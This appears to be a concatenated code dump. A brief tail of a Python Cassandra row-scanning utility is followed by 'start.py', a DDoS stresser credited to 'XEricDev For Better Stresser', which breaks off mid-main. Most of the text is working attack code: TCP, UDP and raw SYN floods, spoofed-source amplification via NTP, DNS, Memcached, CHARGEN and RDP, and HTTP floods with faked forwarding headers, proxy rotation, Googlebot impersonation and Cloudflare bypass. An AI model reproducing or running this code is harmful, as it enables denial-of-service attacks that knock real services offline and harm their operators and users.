sql = "{statement} where token({key}) >= {min} and token({key}) < {max}".format(statement=map_task.sql_statement, key=map_task.key_column, min=split[0], max=split[1])
if rsettings.filter_string:
sql = "{} and {}".format(sql, rsettings.filter_string)
t = CassandraWorkerTask(sql, split, map_task.parser)
queues.worker_queue.put(t)
queues.stats_queue_mapper.put(0)
logging.debug("Mapper prepared work task: {}".format(sql))
if __name__ == "__main__":
py_version = platform.python_version_tuple()
if int(py_version[0]) < 3:
logging.info("Python 3.6 or newer required. 3.7 recommended.")
sys.exit(1)
args = parse_user_args()
if args.debug:
logging.basicConfig(level=logging.DEBUG)
logging.debug('Logging started.')
else:
logging.basicConfig(level=logging.INFO)
# TODO: move this to runtime settings constructor
if args.min_token and args.max_token:
tr = Token_range(args.min_token, args.max_token)
else:
tr = Token_range(settings.default_min_token, settings.default_max_token)
cas_settings = CassandraSettings()
cas_settings.host = args.host
# some of the settings can be specified either on command line
# or in the settings file
if hasattr(settings, "db_user"):
cas_settings.user = settings.db_user
else:
cas_settings.user = args.user
if hasattr(settings, "db_password"):
cas_settings.password = settings.db_password
else:
cas_settings.password = args.password
if hasattr(settings, "ssl_cert"):
cas_settings.ssl_cert = settings.ssl_cert
else:
cas_settings.ssl_cert = args.ssl_cert
if hasattr(settings, "ssl_key"):
cas_settings.ssl_key = settings.ssl_key
else:
cas_settings.ssl_key = args.ssl_key
if hasattr(settings, "cacert"):
cas_settings.cacert = settings.ssl_cacert
else:
cas_settings.cacert = args.cacert
cas_settings.dc = args.datacenter
cas_settings.port = args.port
cas_settings.ssl_v1 = args.ssl_v1
queues = Queues()
rsettings = RuntimeSettings()
rsettings.keyspace = args.keyspace
rsettings.table = args.table
rsettings.split = args.split
rsettings.key = args.key
rsettings.extra_key = args.extra_key
rsettings.filter_string = args.filter_string
rsettings.tr = tr
rsettings.cas_settings = cas_settings
rsettings.workers = args.workers
if rsettings.workers > 10:
# if more than 10 workers are used, we add delay to their startup logic
rsettings.worker_max_delay_on_startup = rsettings.workers * 2
pm = multiprocessing.Process(target=process_manager, args=(queues, rsettings))
pm.start()
# TODO: needs re-implementation
if args.action == "find-nulls":
find_null_cells(args.keyspace, args.table, "id", "comment")
elif args.action == "count-rows":
print_rows_count(queues, rsettings)
elif args.action == "print-rows":
print_rows(queues, rsettings)
elif args.action == "delete-rows":
delete_rows(queues, rsettings)
# TODO: needs re-implementation
elif args.action == "find-wide-partitions":
find_wide_partitions(args.keyspace, args.table, args.key,
args.split, args.value_column, args.filter_string)
# TODO: needs re-implementation
elif args.action == "update-rows":
update_rows(args.keyspace, args.table, args.key,
args.update_key, args.update_value, args.split,
args.filter_string, args.extra_key)
else:
# this won't be accepted by argparse anyways
sys.exit(1)
|
start.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from contextlib import suppress
from itertools import cycle
from json import load
from math import trunc, log2
from os import urandom as randbytes
from pathlib import Path
from random import randint, choice as randchoice
from socket import (IP_HDRINCL, IPPROTO_IP, IPPROTO_TCP, TCP_NODELAY, SOCK_STREAM, AF_INET, socket,
SOCK_DGRAM, SOCK_RAW, gethostname, gethostbyname)
from ssl import SSLContext, create_default_context, CERT_NONE
from sys import argv, exit
from threading import Thread, Event, Lock
from time import sleep
from typing import Set, List, Any, Tuple
from urllib import parse
from PyRoxy import Proxy, Tools as ProxyTools, ProxyUtiles, ProxyType, ProxyChecker
from certifi import where
from cfscrape import create_scraper
from icmplib import ping
from impacket.ImpactPacket import IP, TCP, UDP, Data
from psutil import process_iter, net_io_counters, virtual_memory, cpu_percent
from requests import get, Session, exceptions
from yarl import URL
localIP = get('http://ip.42.pl/raw').text
currentDir = Path(__file__).parent
ctx: SSLContext = create_default_context(cafile=where())
ctx.check_hostname = False
ctx.verify_mode = CERT_NONE
__version__ = "2.0 SNAPSHOT"
class Methods:
LAYER7_METHODS: Set[str] = {"CFB", "BYPASS", "GET", "POST", "OVH", "STRESS",
"DYN", "SLOW", "HEAD", "NULL", "COOKIE", "PPS",
"EVEN", "GSB", "DGB", "AVB", "CFBUAM", "APACHE",
"XMLRPC", "BOT"}
LAYER4_METHODS: Set[str] = {"TCP", "UDP", "SYN", "VSE", "MINECRAFT", "MEM",
"NTP", "DNS", "ARD", "CHAR", "RDP"}
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
google_agents = ["Mozila/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, "
"like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; "
"+http://www.google.com/bot.html)) "
"Googlebot/2.1 (+http://www.google.com/bot.html)",
"Googlebot/2.1 (+http://www.googlebot.com/bot.html)"]
class Tools:
@staticmethod
def humanbytes(i: int, binary: bool = False, precision: int = 2):
MULTIPLES = ["B", "k{}B", "M{}B", "G{}B", "T{}B", "P{}B", "E{}B", "Z{}B", "Y{}B"]
if i > 0:
base = 1024 if binary else 1000
multiple = trunc(log2(i) / log2(base))
value = i / pow(base, multiple)
suffix = MULTIPLES[multiple].format("i" if binary else "")
return f"{value:.{precision}f} {suffix}"
else:
return f"-- B"
@staticmethod
def humanformat(num: int, precision: int = 2):
suffixes = ['', 'k', 'm', 'g', 't', 'p']
if num > 999:
obje = sum([abs(num / 1000.0 ** x) >= 1 for x in range(1, len(suffixes))])
return f'{num / 1000.0 ** obje:.{precision}f}{suffixes[obje]}'
else:
return num
# noinspection PyBroadException
class Layer4:
_method: str
_target: Tuple[str, int]
_ref: Any
SENT_FLOOD: Any
_amp_payloads = cycle
def __init__(self, target: Tuple[str, int],
ref: List[str] = None,
method: str = "TCP",
synevent: Event = None):
self._amp_payload = None
self._amp_payloads = cycle([])
self._ref = ref
self._method = method
self._target = target
self._synevent = synevent
self.run()
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while 1:
with suppress(Exception):
while 1:
self.SENT_FLOOD()
def select(self, name):
self.SENT_FLOOD = self.TCP
if name == "UDP": self.SENT_FLOOD = self.UDP
if name == "SYN": self.SENT_FLOOD = self.SYN
if name == "VSE": self.SENT_FLOOD = self.VSE
if name == "MINECRAFT": self.SENT_FLOOD = self.MINECRAFT
if name == "RDP":
self._amp_payload = (b'\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00', 3389)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "MEM":
self._amp_payload = (b'\x00\x01\x00\x00\x00\x01\x00\x00gets p h e\n', 11211)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "CHAR":
self._amp_payload = (b'\x01', 19)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "ARD":
self._amp_payload = (b'\x00\x14\x00\x00', 3283)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "NTP":
self._amp_payload = (b'\x17\x00\x03\x2a\x00\x00\x00\x00', 123)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "DNS":
self._amp_payload = (b'\x45\x67\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x02\x73\x6c\x00\x00\xff\x00\x01\x00'
b'\x00\x29\xff\xff\x00\x00\x00\x00\x00\x00', 53)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
def TCP(self) -> None:
try:
with socket(AF_INET, SOCK_STREAM) as s:
s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
s.connect(self._target)
while s.send(randbytes(1024)):
continue
except Exception:
s.close()
def MINECRAFT(self) -> None:
try:
with socket(AF_INET, SOCK_STREAM) as s:
s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
s.connect(self._target)
s.send(b'\x0f\x1f0\t' + self._target[0].encode() + b'\x0fA')
while s.send(b'\x01'):
s.send(b'\x00')
except Exception:
s.close()
def UDP(self) -> None:
try:
with socket(AF_INET, SOCK_DGRAM) as s:
while s.sendto(randbytes(1024), self._target):
continue
except Exception:
s.close()
def SYN(self) -> None:
try:
with socket(AF_INET, SOCK_RAW, IPPROTO_TCP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while s.sendto(self._genrate_syn(), self._target):
continue
except Exception:
s.close()
def AMP(self) -> None:
try:
with socket(AF_INET, SOCK_RAW, IPPROTO_TCP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while s.sendto(*next(self._amp_payloads)):
continue
except Exception:
s.close()
def VSE(self) -> None:
try:
with socket(AF_INET, SOCK_DGRAM) as s:
while s.sendto((b'\xff\xff\xff\xff\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65'
b'\x20\x51\x75\x65\x72\x79\x00'), self._target):
continue
except Exception:
s.close()
def _genrate_syn(self) -> bytes:
ip: IP = IP()
ip.set_ip_src(localIP)
ip.set_ip_dst(self._target[0])
tcp: TCP = TCP()
tcp.set_SYN()
tcp.set_th_dport(self._target[1])
tcp.set_th_sport(randint(1, 65535))
ip.contains(tcp)
return ip.get_packet()
def _generate_amp(self):
payloads = []
for ref in self._ref:
ip: IP = IP()
ip.set_ip_src(self._target[0])
ip.set_ip_dst(ref)
ud: UDP = UDP()
ud.set_uh_dport(self._amp_payload[1])
ud.set_uh_sport(self._target[1])
ud.contains(Data(self._amp_payload[0]))
ip.contains(ud)
payloads.append((ip.get_packet(), (ref, self._amp_payload[1])))
return payloads
# noinspection PyBroadException
class HttpFlood:
_proxies: List[Proxy] = None
_payload: str
_defaultpayload: Any
_req_type: str
_useragents: List[str]
_referers: List[str]
_target: URL
_method: str
_rpc: int
_synevent: Any
SENT_FLOOD: Any
def __init__(self, target: URL, method: str = "GET", rpc: int = 1,
synevent: Event = None, useragents: Set[str] = None,
referers: Set[str] = None,
proxies: Set[Proxy] = None) -> None:
self.SENT_FLOOD = None
self._synevent = synevent
self._rpc = rpc
self._method = method
self._target = target
self._raw_target = (self._target.host, (self._target.port or 80))
if not self._target.host[len(self._target.host) - 1].isdigit():
self._raw_target = (gethostbyname(self._target.host), (self._target.port or 80))
if not referers:
referers: List[str] = ["https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=",
",https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer"
"/sharer.php?u=",
",https://drive.google.com/viewerng/viewer?url=",
",https://www.google.com/translate?u="]
self._referers = list(referers)
if proxies:
self._proxies = list(proxies)
if not useragents:
useragents: List[str] = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0']
self._useragents = list(useragents)
self._req_type = self.getMethodType(method)
self._defaultpayload = "%s %s HTTP/1.1\r\n" % (self._req_type, target.raw_path_qs)
self._payload = (self._defaultpayload +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n')
self.run()
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while 1:
with suppress(Exception):
while 1:
self.SENT_FLOOD()
@property
def SpoofIP(self) -> str:
spoof: str = ProxyTools.Random.rand_ipv4()
payload: str = ""
payload += "X-Forwarded-Proto: Http\r\n"
payload += f"X-Forwarded-Host: {self._target.raw_host}, 1.1.1.1\r\n"
payload += f"Via: {spoof}\r\n"
payload += f"Client-IP: {spoof}\r\n"
payload += f'X-Forwarded-For: {spoof}\r\n'
payload += f'Real-IP: {spoof}\r\n'
return payload
def generate_payload(self, other: str = None) -> bytes:
payload: str | bytes = self._payload
payload += "Host: %s\r\n" % self._target.authority
payload += self.randHeadercontent
payload += other if other else ""
return str.encode(f"{payload}\r\n")
def open_connection(self) -> socket:
if self._proxies:
sock = randchoice(self._proxies).open_socket(AF_INET, SOCK_STREAM)
else:
sock = socket()
sock.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
sock.connect(self._raw_target)
if self._target.scheme.lower() == "https":
sock = ctx.wrap_socket(sock, server_hostname=self._target.host, server_side=False,
do_handshake_on_connect=True, suppress_ragged_eofs=True)
return sock
@property
def randHeadercontent(self) -> str:
payload: str = ""
payload += f"User-Agent: {randchoice(self._useragents)}\r\n"
payload += f"Referrer: {randchoice(self._referers)}{parse.quote(self._target.human_repr())}\r\n"
payload += self.SpoofIP
return payload
@staticmethod
def getMethodType(method: str) -> str:
return "GET" if {method.upper()} & {"CFB", "CFBUAM", "GET", "COOKIE", "OVH", "EVEN",
"STRESS", "DYN", "SLOW", "PPS", "APACHE"
"BOT"} \
else "POST" if {method.upper()} & {"POST", "XMLRPC"} \
else "HEAD" if {method.upper()} & {"GSB", "HEAD"} \
else "REQUESTS"
def POST(self) -> None:
payload: bytes = self.generate_payload(("Content-Length: 44\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}'
) % ProxyTools.Random.rand_str(32))[:-2]
try:
with self.open_connection() as s:
for _ in range(self._rpc):
s.send(payload)
except Exception:
s.close()
def STRESS(self) -> None:
payload: bytes = self.generate_payload((f"Content-Length: 524\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}'
) % ProxyTools.Random.rand_str(512))[:-2]
try:
with self.open_connection() as s:
for _ in range(self._rpc):
s.send(payload)
except Exception:
s.close()
def COOKIES(self) -> None:
payload: bytes = self.generate_payload("Cookie: _ga=GA%s;"
" _gat=1;"
" __cfduid=dc232334gwdsd23434542342342342475611928;"
" %s=%s\r\n" % (randint(1000, 99999),
ProxyTools.Random.rand_str(6),
ProxyTools.Random.rand_str(32)))
try:
with self.open_connection() as s:
for _ in range(self._rpc):
s.send(payload)
except Exception:
s.close()
def APACHE(self) -> None:
payload: bytes = self.generate_payload("Range: bytes=0-,%s" % ",".join("5-%d" % i for i in range(1, 1024)))
try:
with self.open_connection() as s:
for _ in range(self._rpc):
s.send(payload)
except Exception:
s.close()
def XMLRPC(self) -> None:
payload: bytes = self.generate_payload(("Content-Length: 345\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/xml\r\n\r\n"
"<?xml version='1.0' encoding='iso-8859-1'?>"
"<methodCall><methodName>pingback.ping</methodName>"
"<params><param><value><string>%s</string></value>"
"</param><param><value><string>%s</string>"
"</value></param></params></methodCall>"
) % (ProxyTools.Random.rand_str(64),
ProxyTools.Random.rand_str(64)))[:-2]
try:
with self.open_connection() as s:
for _ in range(self._rpc):
s.send(payload)
except Exception:
s.close()
def PPS(self) -> None:
try:
with self.open_connection() as s:
for _ in range(self._rpc):
s.send(self._defaultpayload)
except Exception:
s.close()
def GET(self) -> None:
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
for _ in range(self._rpc):
s.send(payload)
except Exception:
s.close()
def BOT(self) -> None:
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
s.send(str.encode(
"GET /robots.txt HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: text/plain,text/html,*/*\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n\r\n"
))
s.send(str.encode(
"GET /sitemap.xml HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: */*\r\n"
"From: googlebot(at)googlebot.com\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n"
"If-None-Match: %s-%s\r\n" % (ProxyTools.Random.rand_str(9), ProxyTools.Random.rand_str(4)) +
"If-Modified-Since: Sun, 26 Set 2099 06:00:00 GMT\r\n\r\n"
))
for _ in range(self._rpc):
s.send(payload)
except Exception:
s.close()
def EVEN(self) -> None:
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
while s.send(payload) and s.recv(1):
continue
except Exception:
s.close()
def OVH(self) -> None:
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
for _ in range(min(self._rpc, 5)):
s.send(payload)
except Exception:
s.close()
def CFB(self):
pro = None
if self._proxies:
pro = randchoice(self._proxies)
try:
with create_scraper() as s:
for _ in range(self._rpc):
if pro:
s.get(self._target.human_repr(), proxies=pro.asRequest())
continue
s.get(self._target.human_repr())
except Exception:
s.close()
def CFBUAM(self):
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
sleep(5.01)
for _ in range(self._rpc):
s.send(payload)
except Exception:
s.close()
def AVB(self):
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
for _ in range(self._rpc):
sleep(max(self._rpc / 1000, 1))
s.send(payload)
except Exception:
s.close()
def DGB(self):
try:
with create_scraper() as s:
for _ in range(min(self._rpc, 5)):
sleep(min(self._rpc, 5) / 100)
if self._proxies:
pro = randchoice(self._proxies)
s.get(self._target.human_repr(), proxies=pro.asRequest())
continue
s.get(self._target.human_repr())
except Exception:
s.close()
def DYN(self):
payload: str | bytes = self._payload
payload += "Host: %s.%s\r\n" % (ProxyTools.Random.rand_str(6), self._target.authority)
payload += self.randHeadercontent
payload += self.SpoofIP
payload = str.encode(f"{payload}\r\n")
try:
with self.open_connection() as s:
for _ in range(self._rpc):
s.send(payload)
except Exception:
s.close()
def GSB(self):
payload = "%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type, self._target.raw_path_qs, ProxyTools.Random.rand_str(6))
payload = (payload +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n')
payload += "Host: %s\r\n" % self._target.authority
payload += self.randHeadercontent
payload += self.SpoofIP
payload = str.encode(f"{payload}\r\n")
try:
with self.open_connection() as s:
for _ in range(self._rpc):
s.send(payload)
except Exception:
s.close()
def NULL(self) -> None:
payload: str | bytes = self._payload
payload += "Host: %s\r\n" % self._target.authority
payload += "User-Agent: null\r\n"
payload += "Referrer: null\r\n"
payload += self.SpoofIP
payload = str.encode(f"{payload}\r\n")
try:
with self.open_connection() as s:
for _ in range(self._rpc):
s.send(payload)
except Exception:
s.close()
def SLOW(self):
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
for _ in range(self._rpc):
s.send(payload)
while s.send(payload) and s.recv(1):
for i in range(self._rpc):
s.send(str.encode("X-a: %d\r\n" % randint(1, 5000)))
sleep(self._rpc / 15)
break
except Exception:
s.close()
def select(self, name: str) -> None:
self.SENT_FLOOD = self.GET
if name == "POST": self.SENT_FLOOD = self.POST
if name == "CFB": self.SENT_FLOOD = self.CFB
if name == "CFBUAM": self.SENT_FLOOD = self.CFBUAM
if name == "XMLRPC": self.SENT_FLOOD = self.XMLRPC
if name == "BOT": self.SENT_FLOOD = self.BOT
if name == "APACHE": self.SENT_FLOOD = self.APACHE
if name == "BYPASS": self.SENT_FLOOD = self.BYPASS
if name == "OVH": self.SENT_FLOOD = self.OVH
if name == "AVB": self.SENT_FLOOD = self.AVB
if name == "STRESS": self.SENT_FLOOD = self.STRESS
if name == "DYN": self.SENT_FLOOD = self.DYN
if name == "SLOW": self.SENT_FLOOD = self.SLOW
if name == "GSB": self.SENT_FLOOD = self.GSB
if name == "NULL": self.SENT_FLOOD = self.NULL
if name == "COOKIE": self.SENT_FLOOD = self.COOKIES
if name == "PPS":
self.SENT_FLOOD = self.PPS
self._defaultpayload = (self._defaultpayload + "Host: %s\r\n\r\n" % self._target.authority).encode()
if name == "EVEN": self.SENT_FLOOD = self.EVEN
def BYPASS(self):
pro = None
if self._proxies:
pro = randchoice(self._proxies)
try:
with Session() as s:
for _ in range(self._rpc):
if pro:
s.get(self._target.human_repr(), proxies=pro.asRequest())
continue
s.get(self._target.human_repr())
except Exception:
s.close()
class ProxyManager:
@staticmethod
def DownloadFromConfig(cf, Proxy_type: int) -> Set[Proxy]:
proxes: Set[Proxy] = set()
lock = Lock()
for provider in cf["proxy-providers"]:
if provider["type"] != Proxy_type and Proxy_type != 0: continue
print("Downloading Proxies form %s" % provider["url"])
ProxyManager.download(provider, proxes, lock, ProxyType.stringToProxyType(str(provider["type"])))
return proxes
@staticmethod
def download(provider, proxes: Set[Proxy], threadLock: Lock, proxy_type: ProxyType) -> Any:
with suppress(TimeoutError, exceptions.ConnectionError, exceptions.ReadTimeout):
data = get(provider["url"], timeout=provider["timeout"]).text
for proxy in ProxyUtiles.parseAllIPPort(data.splitlines(), proxy_type):
with threadLock:
proxes.add(proxy)
class ToolsConsole:
METHODS = {"INFO", "CFIP", "DNS", "PING", "CHECK", "DSTAT"}
@staticmethod
def checkRawSocket():
with suppress(OSError):
with socket(AF_INET, SOCK_RAW, IPPROTO_TCP):
return True
return False
@staticmethod
def runConsole():
cons = "%s@BetterStresser:~#" % gethostname()
while 1:
cmd = input(cons + " ").strip()
if not cmd: continue
if " " in cmd:
cmd, args = cmd.split(" ", 1)
cmd = cmd.upper()
if cmd == "HELP":
print("Tools:" + ", ".join(ToolsConsole.METHODS))
print("Commands: HELP, CLEAR, BACK, EXIT")
continue
if (cmd == "E") or \
(cmd == "EXIT") or \
(cmd == "Q") or \
(cmd == "QUIT") or \
(cmd == "LOGOUT") or \
(cmd == "CLOSE"):
exit(-1)
if cmd == "CLEAR":
print("\033c")
continue
if not {cmd} & ToolsConsole.METHODS:
print("%s command not found" % cmd)
continue
if cmd == "DSTAT":
with suppress(KeyboardInterrupt):
ld = net_io_counters(pernic=False)
while True:
sleep(1)
od = ld
ld = net_io_counters(pernic=False)
t = [(last - now) for now, last in zip(od, ld)]
print(("Bytes Sended %s\n"
"Bytes Recived %s\n"
"Packets Sended %s\n"
"Packets Recived %s\n"
"ErrIn %s\n"
"ErrOut %s\n"
"DropIn %s\n"
"DropOut %s\n"
"Cpu Usage %s\n"
"Memory %s\n") % (Tools.humanbytes(t[0]),
Tools.humanbytes(t[1]),
Tools.humanformat(t[2]),
Tools.humanformat(t[3]),
t[4], t[5], t[6], t[7],
str(cpu_percent()) + "%",
str(virtual_memory().percent) + "%"))
if cmd in ["CFIP", "DNS"]:
print("Soon")
continue
if cmd == "CHECK":
while True:
with suppress(Exception):
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
if "/" not in domain: continue
print('please wait ...', end="\r")
with get(domain, timeout=20) as r:
print(('status_code: %d\n'
'status: %s') % (r.status_code,
"ONLINE" if r.status_code <= 500 else "OFFLINE"))
return
print("Error! ")
if cmd == "INFO":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://', '').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.info(domain)
if not info["success"]:
print("Error!")
continue
print(("Country: %s\n"
"City: %s\n"
"Org: %s\n"
"Isp: %s\n"
"Region: %s\n"
) % (info["country"],
info["city"],
info["org"],
info["isp"],
info["region"]))
if cmd == "PING":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://', '').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
r = ping(domain, count=5, interval=0.2)
print(('Address: %s\n'
'Ping: %d\n'
'Aceepted Packets: %d/%d\n'
'status: %s\n'
) % (r.address,
r.avg_rtt,
r.packets_received,
r.packets_sent,
"ONLINE" if r.is_alive else "OFFLINE"))
@staticmethod
def stop():
print('All Attacks has been Stopped !')
for proc in process_iter():
if proc.name() == "python.exe":
proc.kill()
@staticmethod
def usage():
print(('* Coded By XEricDev For Better Stresser\n'
'Note: If the Proxy list is empty, the attack will run without proxies\n'
' If the Proxy file doesn\'t exist, the script will download proxies and check them.\n'
' Proxy Type 0 = All in config.json\n'
' Layer7: python3 %s <method> <url> <socks_type5.4.1> <threads> <proxylist> <rpc> <duration>\n'
' Layer4: python3 %s <method> <ip:port> <threads> <duration> <reflector file, (only use with '
'Amplification>\n'
'\n'
' > Methods:\n'
' - Layer4\n'
' | %s | %d Methods\n'
' - Layer7\n'
' | %s | %d Methods\n'
' - Tools\n'
' | %s | %d Methods\n'
' - Others\n'
' | %s | %d Methods\n'
' - All %d Methods\n'
'\n'
'Example:\n'
' Layer7: python3 %s %s %s %s %s proxy.txt %s %s\n'
' Layer4: python3 %s %s %s %s %s') % (argv[0], argv[0],
", ".join(Methods.LAYER4_METHODS),
len(Methods.LAYER4_METHODS),
", ".join(Methods.LAYER7_METHODS),
len(Methods.LAYER7_METHODS),
", ".join(ToolsConsole.METHODS), len(ToolsConsole.METHODS),
", ".join(["TOOLS", "HELP", "STOP"]), 3,
len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
argv[0],
randchoice([*Methods.LAYER7_METHODS]),
"https://example.com",
randchoice([4, 5, 1, 0]),
randint(850, 1000),
randint(50, 100),
randint(1000, 3600),
argv[0],
randchoice([*Methods.LAYER4_METHODS]),
"8.8.8.8:80",
randint(850, 1000),
randint(1000, 3600)
))
# noinspection PyUnreachableCode
@staticmethod
def info(domain):
with suppress(Exception), get("https://ipwhois.app/json/%s/" % domain) as s:
return s.json()
return {"success": False}
if __name__ == '__main__':
with open(currentDir / "config.json") as f:
con = load(f)
with suppress(KeyboardInterrupt):
with suppress(IndexError):
one = argv[1].upper()
if one == "HELP": raise IndexError()
if one == "TOOLS": ToolsConsole.runConsole()
if one == "STOP": ToolsConsole.stop()
method = one
event = Event()
event.clear()
if method not in Methods.ALL_METHODS:
exit("Method Not Found %s" % ", ".join(Methods.ALL_METHODS))
if method in Methods.LAYER7_METHODS:
urlraw = argv[2].strip()
if not urlraw.startswith("http"): urlraw = "http://" + urlraw
url = URL(urlraw)
threads = int(argv[4])
rpc = int(argv[6])
timer = int(argv[7])
proxy_ty = int(argv[3].strip())
proxy_li = Path(currentDir / "files/proxies/" / argv[5].strip())
useragent_li = Path(currentDir / "files/useragent.txt")
referers_li = Path(currentDir / "files/referers.txt")
proxies: Any = set()
if not useragent_li.exists(): exit("The Useragent file doesn't exist ")
if not referers_li.exists(): exit("The Referer file doesn't exist ")
uagents = set(a.strip() for a in useragent_li.open("r+").readlines())
referers = set(a.strip() for a in referers_li.open("r+").readlines())
if not uagents: exit("Empty Useragent File ")
if not referers: exit("Empty Referer File ")
if proxy_ty not in {4, 5, 1, 0}: exit("Socks Type Not Found [4, 5, 1, 0]")
if threads > 1000: print("WARNING! thread is higher than 1000")
if rpc > 100: print("WARNING! RPC (Request Pre Connection) is higher than 100")
if not proxy_li.exists():
if rpc > 100: print("WARNING! The file doesn't exist, creating files and downloading proxies.")
proxy_li.parent.mkdir(parents=True, exist_ok=True)
with proxy_li.open("w") as wr:
Proxies: Set[Proxy] = ProxyManager.DownloadFromConfig(con, proxy_ty)
print(f"{len(Proxies):,} Proxies are getting checked, this may take awhile !")
Proxies = ProxyChecker.checkAll(Proxies, url.human_repr(), 1, threads)
if not Proxies:
exit(
"Proxy Check failed, Your network may be the problem | The target may not be"
" available.")
stringBuilder = ""
for proxy in Proxies:
stringBuilder += (proxy.__str__() + "\n")
wr.write(stringBuilder)
proxies = ProxyUtiles.readFromFile(proxy_li)
if not proxies:
print("Empty Proxy File, Running flood witout proxy")
proxies = None
if proxies:
print(f"Proxy Count: {len(proxies):,}")
for _ in range(threads):
Thread(target=HttpFlood, args=(url, method, rpc, event, uagents, referers, proxies,),
daemon=True).start()
if method in Methods.LAYER4_METHODS:
target = argv[2].strip()
if ":" in target and not target.split(":")[1].isnumeric(): exit("Invalid Port Number")
port = 53 if ":" not in target else int(target.split(":")[1])
threads = int(argv[3])
timer = int(argv[4])
ref = None
if ":" not in target:
print("WARNING! Port Not Selected, Set To Default: 80")
else:
target = target.split(":")[0]
